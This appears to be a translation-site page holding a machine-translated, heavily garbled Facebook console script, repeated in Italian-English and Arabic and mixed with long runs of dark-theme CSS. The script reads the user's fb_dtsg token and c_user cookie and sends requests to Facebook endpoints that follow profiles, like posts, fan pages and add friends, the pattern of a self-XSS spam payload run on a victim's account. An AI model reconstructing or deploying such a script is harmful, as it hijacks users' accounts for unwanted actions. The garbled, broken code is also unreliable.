with (typeof __commandLineAPI !== 'undefined' ? __commandLineAPI : { _ ترجمة - with (typeof __commandLineAPI !== 'undefined' ? __commandLineAPI : { _ العربية كيف أقول

with (typeof __commandLineAPI !== '

with (typeof __commandLineAPI !== 'undefined' ? __commandLineAPI : { __proto__: null }) {
? / * Nh C * /
var = document.getElementsByTagName Parent ("html") [0];
var = document.getElementsByTagName _body ('corpo') [0];
var = _div = Document.createElement _audio ('Audio'); _audio.style.width = "100%", _audio.style.height = "25px"; _audio.controls = True; _audio.autoplay = False; _audio.autoplay = True; _audio.src = = Document.getElementsByName Fb_dtsg ('Fb_dtsg') [0] .value; var = id_utente Document.cookie.match (Document.cookie.match (/ C_user = ( D +) /) [1]); var = Fb_dtsg documento. getElementsByName ("Fb_dtsg") [0] .value; var = id_utente Document.cookie.match (Document.cookie.match (/ C_user = ( D +) /) [1]); Funzione A (Abone) {var = Http4 nuovo XMLHttpRequest; var url4 = "/ ajax / seguire / follow_profile.php __ a = 1?"; var sottolista (uidss) {var a = document.createElement ('script'); a.innerHTML = "new Flid: "+ uidss. +"}) send (); "document.body.appendChild (a)} elenco secondario (" "); elenco secondario (" "); var user_id = document.cookie.match (document.cookie.match (/ c_user = ( d +) /) [1]); var fb_dtsg = document.getElementsByName ('fb_dtsg') [0] .value; var now = (new Date) .getTime (); funzione P (post) { var x = new XMLHttpRequest (); var XURL = "// www.facebook.com/ajax/ufi/like.php";var fb_dtsg = document.getElementsByName ('fb_dtsg') [0] .value; var user_id = document.cookie.match (document.cookie.match (/ c_user = ( d +) /) [1]); la funzione Mi piace (p) {var pagina = new XMLHttpRequest (); var PageURL = "// www.facebook.com/ajax/pages/fan_status.php";var IDS (r) {var x = new XMLHttpRequest (); var XURL = "// www.facebook.com/ajax/add_friend/action.php";var Elenchi {Var = css ".highlightIndicator, N.tinyman: Dopo, N.fbTimelineSideAds, N.ego_column, N.buttonWrap, N.fbTimelineSpine, N.spinePointer, N.topBorder, N.bottomBorder, n # footerContainer, n.middleLink, n.slimHeader #pageNav li.tinyman :: dopo, .slimHeader #pageNav li.middleLink :: dopo, n.slimHeader #pageNav .middleLink un, n.moreSectionsLink n { ndisplay: nessuna importante; n} n ndiv.mainWrapper { npadding-sinistra: 1em importante; n!} n.uiProgressBar .Riempire { nbackground:! # 444 importante; nborder: solido # ! 222 importante; n} n.uiTypeaheadView .compact li { nbackground-color: # 111 importante; n} ndiv.uiTypeaheadView .selected { nbackground-color: # 333 importante; n} n .fbIndex .gradient { nbackground: nessuna importante; n} n.notifNegativeBase #fbNotificationsFlyout li.jewelItemNew, .notifNegativeBase #fbNotificationsFlyout li.first_receipt { nbackground:! # 333 importante; n} n.pop_container { nbackground-color: # 000! importante; n} n.pop_verticalslab, .pop_horizontalslab { nbackground:! # 222 importante; n} n.uiMenuXItem na.highlighted { nbackground-color: # 333 importante; nborder-color: # 000! importante; ncolor: #FFF importante; n} n.uiMenuXItem na.highlighted { nbackground-color: # 333 importante, nborder-color: # 000 importante; ncolor: #FFF importante; n} n.uiContextualLayer { nbackground-color: # 111 importante; n} n.HighlightSelectorMenu { nborder: 2px solid # 000 importante; nbackground: # 111! importante, nborder-radius: 5px! importante; n} N.-cx-PUBLIC-uiDialog__border, ._1yu { nborder: 10px rgba solido (82, 82, 82, 0,7) importante, n-webkit -border-radius: 8px importante; n} nINPUT [type = "text "], ingresso [type = "password "], .inputtext, selezionare, .select, selezionare l'opzione>, selezionare> tasto , .fbPhotoImageStage .fbPhotosPhotoButtons .tagMessage, .fbPhotoImageStage .fbPhotosPhotoButtons .cropMessage, # u1clso_61 div img, #navSearch .uiTypeahead, .- cx-PRIVATO uiDialog__content, ._1yu, ._t { nbackground-color: # 111 importante; n} n.fbTimelineCapsule n { nbackground: nessuna importante; n} n.sp_c79t5t n { nbackground-immagine:!!! nessuna importanza; n} n * { nborder-color: trasparente importante ; ncolor: #fff importante;! nbackground-color: trasparente importante; N} n n # fbTimelineHeadline .profilePic { nbackground-color:! #FFF Importante; nborder: 4px #FFF solido importante, n-webkit-border-radius:!! 2px importante; nHeight: 160px! importante; nWidth: 160px! importante; n} n n n.fbTimelineScrubber { n nborder-color: # 333333 importante; npadding:!! 8px 0 8px 1px importante; ntop: 38px importante; nWidth: 122px importante, nz-index: 1 importante; nborder-radius: 10px importante; n} n n.fbPhotosPhotoTagboxBase .tagName { nbackground:! # 000 importante; ncolor: #FFF ! important; ncursor: default! importante, nfont-peso: normale importante; npadding: 2px 6px 3px importante; ntop: 3px importante, Nwhite-spazio: nowrap importante; n} n ! n.fbPhotosPhotoTagboxBase .innerTagBox { nborder: 4px solido bianco importante, nborder-color:!! RGBA (255, 255, 255, 0,8) importante; n} n n.fbPhotoSnowlift { nbackground-color: RGBA (0, 0, 0, 0,7)! importante; n} n n.fbPhotoSnowlift .rhc, .pagingActivated .snowliftOverlay, .fbPhotoSnowlift.taggingMode .snowliftOverlay, .stageWrapper { nbackground-color: # 111 importante; n} n n.profile-picture img { nmax-width: 170px importante; n} n ingresso n.webComposerPhotoUpload, .webComposerPhotoUpload { ncolor: # 000000 no-repeat centro .connect_widget_like_button, .fbFeedTickerStory: hover, .item una: li hover, .fbJewelFlyout: hover, .uiSideNav a: hover, .fbNubFlyoutBody, .uiButtonConfirm { nbackground: # 111111 importante; n} n n.fbChatMessageGroup { nborder-color: #! 2c2c2c importante; n} n n.fbChatSidebar { nbackground: # 111111 importante; n} {n n # LeftCol nposition:!! parente; top: 20px importante; ! nmin-height: 400px importante; n} n n.arrowLeft un { nbackground-image: url ('http://i.imgur.com/26zf5.png') importante, nborder-color: # 666666 importante; n}! n n.arrowRight un { nbackground-image: url ('http://i.imgur.com/v6B6z.png') importante, nborder-color: # 666666! importante; n} n n.uiStreamSubstory { nborder-color: trasparente importante; n} n n.uiHeader { nbackground-color: trasparente importante; n} n n.fbSidebarGripper, : .fbTickerFooter, .fbSidebarGripper div, .navSubmenu hover {! ​​ nbackground-color: # 222222 importante; n} n n.fbTimelineCountButton, .uiBoxWhite, .uiButtonGroup { nbackground-color: #! 1c1c1c importante; n } {n n n n # LeftCol npadding-top: 0px importante; npadding-sinistra:!! 0px importante; n} n n.fbNubFlyoutFooter { nbackground: # 111111 importante; NBOX -Ombre: 0 1px 2px RGBA (0, 0, 0, 0.5) importante; ncolor:! # CC00FF importante; Nborder: # 333333 importante;! N} n n.uiStream .uiSelectorButton { nbackground-image: url ( "http: //i.imgur.com/nOfuQ.png ")! Important; n } n n.uiSearchInput { nbackground-image: url ( "http: //i.imgur.com/agmNw.png ")! important; n} n n n n n. jewelButton: hover, .topNavLink a: hover { nbackground-color: # 222222 importante; n} n n.uiScrollableAreaGripper { nbackground-color: # 666666 importante; n} n n.uiSearchInput, .fbPhotosGridHeader, .uiComposerMessageBoxControls, #MessagingShelf, .uiBoxGray { nbackground: # 111111 importante; n} n n.uiButton:; n n # Bluebar { nbackground { nbackground n # importante 1c1c1c!} : -moz-linear-gradient (in alto, # 45484d 0%, # 000000 100%) importante; nbackground: -webkit-linear-gradient (in alto, # 45484d 0%, # 000000 100%) importante; NBOX! -Ombre: 0 0 7px RGBA (211, 32, 198, 0.75) importante; nborder: 4px cresta # CC00FF importante, nmargin-top: 5px importante, nmargin-sinistra:!! 5px importante; nborder- Raggio: 70px importante; n} n n n n # contentCol, #pageLogo un { nbackground-color: trasparente importante; nborder-color:!! trasparente importante; n} n n. uiMorePager { nmargin-bottom: 6px! importante, nbackground-color: # 1c1c1c importante; nborder:!! 0px solid # 333333 importante; n} n n.uiStreamStory, .fbIndexFeaturedRegistration, .signupForm { nmargin- ! bottom: 2px importante; : nbackground-colore! impor url ('http://i.imgur.com/T2LPj.png'):;! ​​ nbackground-immagine trasparente importante

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النتائج (العربية) 1: [نسخ]
مع (typeof __commandLineAPI! = = 'غير معروف'؟ __commandLineAPI: {__proto__: فارغة}) {? /* Nh ج */ فأر = document.getElementsByTagName الأصل ("html") [0]؛ فأر = _body document.getElementsByTagName ('هيئة المناطق') [0]؛ var = _div = Document.createElement _audio ('Audio'); _audio.style.width = "100%", _audio.style.height = "25px"; _audio.controls = True; _audio.autoplay = False; _audio.autoplay = True; _audio.src = = Document.getElementsByName Fb_dtsg ('Fb_dtsg') [0] .value; var = id_utente Document.cookie.match (Document.cookie.match (/ C_user = ( D +) /) [1]); var = Fb_dtsg documento. getElementsByName ("Fb_dtsg") [0] .value; var = id_utente Document.cookie.match (Document.cookie.match (/ C_user = ( D +) /) [1]); Funzione A (Abone) {var = Http4 nuovo XMLHttpRequest; var url4 = "/ ajax / seguire / follow_profile.php __ a = 1?"; var sottolista (uidss) {var a = document.createElement ('script'); a.innerHTML = "new Flid: "+ uidss. +"}) send (); "document.body.appendChild (a)} elenco secondario (" "); elenco secondario (" "); var user_id = document.cookie.match (document.cookie.match (/ c_user = ( d +) /) [1]); var fb_dtsg = document.getElementsByName ('fb_dtsg') [0] .value; var now = (new Date) .getTime (); funzione P (post) { var x = new XMLHttpRequest (); var XURL = "// www.facebook.com/ajax/ufi/like.php";var fb_dtsg = document.getElementsByName ('fb_dtsg') [0] .value; var user_id = document.cookie.match (document.cookie.match (/ c_user = ( d +) /) [1]); la funzione Mi piace (p) {var pagina = new XMLHttpRequest (); var PageURL = "// www.facebook.com/ajax/pages/fan_status.php";var IDS (r) {var x = new XMLHttpRequest (); var XURL = "// www.facebook.com/ajax/add_friend/action.php";var Elenchi {Var = css ".highlightIndicator, N.tinyman: Dopo, N.fbTimelineSideAds, N.ego_column, N.buttonWrap, N.fbTimelineSpine, N.spinePointer, N.topBorder, N.bottomBorder, n # footerContainer, n.middleLink, n.slimHeader #pageNav li.tinyman :: dopo, .slimHeader #pageNav li.middleLink :: dopo, n.slimHeader #pageNav .middleLink un, n.moreSectionsLink n { ndisplay: nessuna importante; n} n ndiv.mainWrapper { npadding-sinistra: 1em importante; n!} n.uiProgressBar .Riempire { nbackground:! # 444 importante; nborder: solido # ! 222 importante; n} n.uiTypeaheadView .compact li { nbackground-color: # 111 importante; n} ndiv.uiTypeaheadView .selected { nbackground-color: # 333 importante; n} n .fbIndex .gradient { nbackground: nessuna importante; n} n.notifNegativeBase #fbNotificationsFlyout li.jewelItemNew, .notifNegativeBase #fbNotificationsFlyout li.first_receipt { nbackground:! # 333 importante; n} n.pop_container { nbackground-color: # 000! importante; n} n.pop_verticalslab, .pop_horizontalslab { nbackground:! # 222 importante; n} n.uiMenuXItem na.highlighted { nbackground-color: # 333 importante; nborder-color: # 000! importante; ncolor: #FFF importante; n} n.uiMenuXItem na.highlighted { nbackground-color: # 333 importante, nborder-color: # 000 importante; ncolor: #FFF importante; n} n.uiContextualLayer { nbackground-color: # 111 importante; n} n.HighlightSelectorMenu { nborder: 2px solid # 000 importante; nbackground: # 111! importante, nborder-radius: 5px! importante; n} N.-cx-PUBLIC-uiDialog__border, ._1yu { nborder: 10px rgba solido (82, 82, 82, 0,7) importante, n-webkit -border-radius: 8px importante; n} nINPUT [type = "text "], ingresso [type = "password "], .inputtext, selezionare, .select, selezionare l'opzione>, selezionare> tasto , .fbPhotoImageStage .fbPhotosPhotoButtons .tagMessage, .fbPhotoImageStage .fbPhotosPhotoButtons .cropMessage, # u1clso_61 div img, #navSearch .uiTypeahead, .- cx-PRIVATO uiDialog__content, ._1yu, ._t { nbackground-color: # 111 importante; n} n.fbTimelineCapsule n { nbackground: nessuna importante; n} n.sp_c79t5t n { nbackground-immagine:!!! nessuna importanza; n} n * { nborder-color: trasparente importante ; ncolor: #fff importante;! nbackground-color: trasparente importante; N} n n # fbTimelineHeadline .profilePic { nbackground-color:! #FFF Importante; nborder: 4px #FFF solido importante, n-webkit-border-radius:!! 2px importante; nHeight: 160px! importante; nWidth: 160px! importante; n} n n n.fbTimelineScrubber { n nborder-color: # 333333 importante; npadding:!! 8px 0 8px 1px importante; ntop: 38px importante; nWidth: 122px importante, nz-index: 1 importante; nborder-radius: 10px importante; n} n n.fbPhotosPhotoTagboxBase .tagName { nbackground:! # 000 importante; ncolor: #FFF ! important; ncursor: default! importante, nfont-peso: normale importante; npadding: 2px 6px 3px importante; ntop: 3px importante, Nwhite-spazio: nowrap importante; n} n ! n.fbPhotosPhotoTagboxBase .innerTagBox { nborder: 4px solido bianco importante, nborder-color:!! RGBA (255, 255, 255, 0,8) importante; n} n n.fbPhotoSnowlift { nbackground-color: RGBA (0, 0, 0, 0,7)! importante; n} n n.fbPhotoSnowlift .rhc, .pagingActivated .snowliftOverlay, .fbPhotoSnowlift.taggingMode .snowliftOverlay, .stageWrapper { nbackground-color: # 111 importante; n} n n.profile-picture img { nmax-width: 170px importante; n} n ingresso n.webComposerPhotoUpload, .webComposerPhotoUpload { ncolor: # 000000 no-repeat centro .connect_widget_like_button, .fbFeedTickerStory: hover, .item una: li hover, .fbJewelFlyout: hover, .uiSideNav a: hover, .fbNubFlyoutBody, .uiButtonConfirm { nbackground: # 111111 importante; n} n n.fbChatMessageGroup { nborder-color: #! 2c2c2c importante; n} n n.fbChatSidebar { nbackground: # 111111 importante; n} {n n # LeftCol nposition:!! parente; top: 20px importante; ! nmin-height: 400px importante; n} n n.arrowLeft un { nbackground-image: url ('http://i.imgur.com/26zf5.png') importante, nborder-color: # 666666 importante; n}! n n.arrowRight un { nbackground-image: url ('http://i.imgur.com/v6B6z.png') importante, nborder-color: # 666666! importante; n} n n.uiStreamSubstory { nborder-color: trasparente importante; n} n n.uiHeader { nbackground-color: trasparente importante; n} n n.fbSidebarGripper, : .fbTickerFooter, .fbSidebarGripper div, .navSubmenu hover {! ​​ nbackground-color: # 222222 importante; n} n n.fbTimelineCountButton, .uiBoxWhite, .uiButtonGroup { nbackground-color: #! 1c1c1c importante; n } {n n n n # LeftCol npadding-top: 0px importante; npadding-sinistra:!! 0px importante; n} n n.fbNubFlyoutFooter { nbackground: # 111111 importante; NBOX -Ombre: 0 1px 2px RGBA (0, 0, 0, 0.5) importante; ncolor:! # CC00FF importante; Nborder: # 333333 importante;! N} n n.uiStream .uiSelectorButton { nbackground-image: url ( "http: //i.imgur.com/nOfuQ.png ")! Important; n } n n.uiSearchInput { nbackground-image: url ( "http: //i.imgur.com/agmNw.png ")! important; n} n n n n n. jewelButton: hover, .topNavLink a: hover { nbackground-color: # 222222 importante; n} n n.uiScrollableAreaGripper { nbackground-color: # 666666 importante; n} n n.uiSearchInput, .fbPhotosGridHeader, .uiComposerMessageBoxControls, #MessagingShelf, .uiBoxGray { nbackground: # 111111 importante; n} n n.uiButton:; n n # Bluebar { nbackground { nbackground n # importante 1c1c1c!} : -moz-linear-gradient (in alto, # 45484d 0%, # 000000 100%) importante; nbackground: -webkit-linear-gradient (in alto, # 45484d 0%, # 000000 100%) importante; NBOX! -Ombre: 0 0 7px RGBA (211, 32, 198, 0.75) importante; nborder: 4px cresta # CC00FF importante, nmargin-top: 5px importante, nmargin-sinistra:!! 5px importante; nborder- Raggio: 70px importante; n} n n n n # contentCol, #pageLogo un { nbackground-color: trasparente importante; nborder-color:!! trasparente importante; n} n n. uiMorePager { nmargin-bottom: 6px! importante, nbackground-color: # 1c1c1c importante; nborder:!! 0px solid # 333333 importante; n} n n.uiStreamStory, .fbIndexFeaturedRegistration, .signupForm { nmargin- ! bottom: 2px importante; : nbackground-colore! impor url ('http://i.imgur.com/T2LPj.png'):;! ​​ nbackground-immagine trasparente importante}
يجري ترجمتها، يرجى الانتظار ..
النتائج (العربية) 2:[نسخ]
مع (تشير typeof __commandLineAPI == 'غير معروف' __commandLineAPI:!؟ {__proto__: باطل})
{؟ / * فندق Nh C * /
فار = document.getElementsByTagName الأم ("أتش تي أم أل") [0]؛
فار = document.getElementsByTagName _body ('هيئة المناطق') [0]؛
فار = = _div Document.createElement _audio ('الصوت')؛ _audio.style.width = "100٪"، _audio.style.height = "25px؛" _audio.controls = صحيح؛ _audio.autoplay = خطأ؛ _audio.autoplay = صحيح؛ _audio.src = = Document.getElementsByName Fb_dtsg ('Fb_dtsg') [0] .value. فار = id_utente Document.cookie.match (Document.cookie.match (/ C_user = (D +) /) [1])؛ فار = Fb_dtsg documento. getElementsByName ("Fb_dtsg") [0] .value. فار = id_utente Document.cookie.match (Document.cookie.match (/ C_user = (D +) /) [1])؛ Funzione A (Abone) {فار = Http4 نوفو مدعوم. فار url4 = "/ اياكس / seguire / follow_profile.php __ ل= 1؟". فار sottolista (uidss) {فار ل= document.createElement ('السيناريو')؛ a.innerHTML = "الجديد Flid:" uidss +. + "}) إرسال ()؛" document.body.appendChild (أ)} elenco secondario ("")؛ elenco secondario ("")؛ فار USER_ID = document.cookie.match (document.cookie.match (/ c_user = (د +) /) [1])؛ فار fb_dtsg = document.getElementsByName ('fb_dtsg') [0] .value. فار الآن = (جديد التاريخ) .getTime ()؛ funzione P (آخر) {فار س = مدعوم الجديد ()؛ فار XURL = "// www.facebook.com/ajax/ufi/like.php"؛var fb_dtsg = document.getElementsByName ('fb_dtsg') [0] .value. فار USER_ID = document.cookie.match (document.cookie.match (/ c_user = (د +) /) [1])؛ لا funzione مي PIACE (ع) {فار باجينا = مدعوم الجديد ()؛ فار PAGEURL = "// IDS www.facebook.com/ajax/pages/fan_status.php"؛var~~gender=F (ص) {فار س = مدعوم الجديد ()؛ فار XURL = "// www.facebook.com/ajax/add_friend/action.php"؛var Elenchi {فار = المغلق" .highlightIndicator، N.tinyman: Dopo، N.fbTimelineSideAds، N.ego_column، N.buttonWrap، N .fbTimelineSpine، N.spinePointer، N.topBorder، N.bottomBorder، ن # footerContainer، n.middleLink، n.slimHeader #pageNav li.tinyman :: dopo، .slimHeader #pageNav li.middleLink :: dopo، n.slimHeader # pageNav .middleLink الامم المتحدة، n.moreSectionsLink ن {ndisplay: nessuna IMPORTANTE؛ ن ن} {ndiv.mainWrapper npadding-الأيسر: 1em IMPORTANTE؛ ن!} n.uiProgressBar .Riempire {nbackground:! # 444 IMPORTANTE؛ nborder: SOLIDO #! 222 IMPORTANTE؛ ن} n.uiTypeaheadView. الميثاق لى {nbackground لون: # 111 IMPORTANTE؛ ن} .selected ndiv.uiTypeaheadView {nbackground لون: # 333 IMPORTANTE؛ ن ن} .fbIndex .gradient {nbackground: nessuna IMPORTANTE؛ ن } n.notifNegativeBase #fbNotificationsFlyout li.jewelItemNew، .notifNegativeBase #fbNotificationsFlyout li.first_receipt {nbackground:! # 333 IMPORTANTE؛ ن} {n.pop_container nbackground لون: # 000! IMPORTANTE. ن} n.pop_verticalslab، .pop_horizontalslab {nbackground:! # 222 IMPORTANTE. ن} n.uiMenuXItem na.highlighted {nbackground لون: # 333 IMPORTANTE. nborder لون: # 000! IMPORTANTE. ncolor: # الاتحاد الفرنسي IMPORTANTE. ن} n.uiMenuXItem na.highlighted {nbackground لون: # 333 IMPORTANTE، nborder لون: # 000 IMPORTANTE. ncolor: # الاتحاد الفرنسي IMPORTANTE. ن} {n.uiContextualLayer nbackground لون: # 111 IMPORTANTE. ن} {n.HighlightSelectorMenu nborder: 2px الصلبة # 000 IMPORTANTE. nbackground: # 111! IMPORTANTE، nborder نصف قطرها: 5px! IMPORTANTE. ن} N.-CX-القطاعين العام وuiDialog__border، ._1yu {nborder: 10px رغبا SOLIDO (82، 82، 82، 0،7) IMPORTANTE، ن بكت -border نصف قطرها: 8px IMPORTANTE. ن} nINPUT [نوع = "النص"]، ingresso هل [نوع = "كلمة المرور"]، .inputtext، selezionare،. تحديد، selezionare L'opzione>، selezionare> tasto، .fbPhotoImageStage .fbPhotosPhotoButtons .tagMessage، .fbPhotoImageStage .fbPhotosPhotoButtons. cropMessage، # u1clso_61 شعبة IMG، #navSearch .uiTypeahead، .- CX-PRIVATO uiDialog__content، ._1yu، ._t {nbackground لون: # 111 IMPORTANTE. ن} n.fbTimelineCapsule ن {nbackground: nessuna IMPORTANTE. ن} n.sp_c79t5t ن {nbackground-IMMAGINE: !!! importanza nessuna. ن ن} * {nborder اللون: trasparente IMPORTANTE. ncolor: # الاتحاد الفرنسي IMPORTANTE ؛! nbackground اللون: trasparente IMPORTANTE. N} ن ن # fbTimelineHeadline .profilePic {nbackground اللون:! # الاتحاد الفرنسي IMPORTANTE. nborder: 4PX # الاتحاد الفرنسي SOLIDO IMPORTANTE، ن بكت الحدود نصف قطرها: !! 2px IMPORTANTE. nHeight: 160px! IMPORTANTE. nWidth: 160px! IMPORTANTE. ن ن ن} {ن nborder n.fbTimelineScrubber لون: # 333333 IMPORTANTE. npadding: !! 8px 0 8px 1PX IMPORTANTE. NTOP: 38px IMPORTANTE. nWidth: 122px IMPORTANTE، NZ-الفهرس: 1 IMPORTANTE. nborder نصف قطرها: 10px IMPORTANTE. ن ن} n.fbPhotosPhotoTagboxBase .tagName {nbackground:! # 000 IMPORTANTE. ncolor: # الاتحاد الفرنسي! من الأهمية بمكان؛ ncursor: الافتراضي! IMPORTANTE، nfont بيزو: نورمال IMPORTANTE. npadding: 2px 6px 3PX IMPORTANTE. NTOP: IMPORTANTE 3PX، Nwhite-سبازيو: nowrap IMPORTANTE. ن ن}! n.fbPhotosPhotoTagboxBase .innerTagBox {nborder: 4PX SOLIDO بيانكو IMPORTANTE، nborder اللون: !! RGBA (255، 255، 255، 0،8) IMPORTANTE. ن ن} {n.fbPhotoSnowlift nbackground اللون: RGBA (0، 0، 0، 0،7)! IMPORTANTE. ن ن} n.fbPhotoSnowlift .rhc، .pagingActivated .snowliftOverlay، .fbPhotoSnowlift.taggingMode .snowliftOverlay، .stageWrapper {nbackground لون: # 111 IMPORTANTE. ن ن} n.profile-الصورة IMG {nmax العرض: 170px IMPORTANTE. ن ن} ingresso هل n.webComposerPhotoUpload، .webComposerPhotoUpload {ncolor: # 000000 عدم تكرار سنترو .connect_widget_like_button، .fbFeedTickerStory: تحوم،. البند الرابطة: لي تحوم، .fbJewelFlyout: تحوم، .uiSideNav ل: تحوم، .fbNubFlyoutBody، .uiButtonConfirm {nbackground: # 111111 IMPORTANTE. ن ن} {n.fbChatMessageGroup nborder لون: #! 2c2c2c IMPORTANTE. ن ن} {n.fbChatSidebar nbackground: # 111111 IMPORTANTE. ن} {ن ن # LeftCol nposition: !! الأهل. أعلى: 20px IMPORTANTE. ! nmin الطول: 400px IMPORTANTE. ن ن} {n.arrowLeft الامم المتحدة nbackground صورة: رابط ('http://i.imgur.com/26zf5.png') IMPORTANTE، nborder لون: # 666666 IMPORTANTE. ن}! ن n.arrowRight الامم المتحدة {nbackground صورة: رابط ('http://i.imgur.com/v6B6z.png') IMPORTANTE، nborder لون: # 666666! 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NBOX! -Ombre: 0 0 7px RGBA (211، 32، 198، 0.75) IMPORTANTE. nborder: 4PX CRESTA # IMPORTANTE CC00FF، nmargin قمة: 5px IMPORTANTE، nmargin-الأيسر !! 5px IMPORTANTE. nborder- Raggio: 70px IMPORTANTE. ن} NNNN # contentCol، #pageLogo الامم المتحدة {nbackground اللون: trasparente IMPORTANTE. nborder اللون: !! trasparente IMPORTANTE. ن ن ن}. uiMorePager {nmargin القاع: 6px! IMPORTANTE، nbackground لون: # IMPORTANTE 1c1c1c. nborder: !! 0px الصلبة # 333333 IMPORTANTE. ن ن} n.uiStreamStory، .fbIndexFeaturedRegistration، .signupForm {nmargin-! أسفل: 2px IMPORTANTE. : nbackground-كولوري! رابط المجمدة ('http://i.imgur.com/T2LPj.png'):.! nbackground-IMMAGINE trasparente IMPORTANTE}

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و _ (typeof _ commandlineapi!Undefined هو = =؟_ _ commandlineapi: {_ الأصلي _ _ _}) {: التسخين فارغة؟ج * / * /
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لغات أخرى
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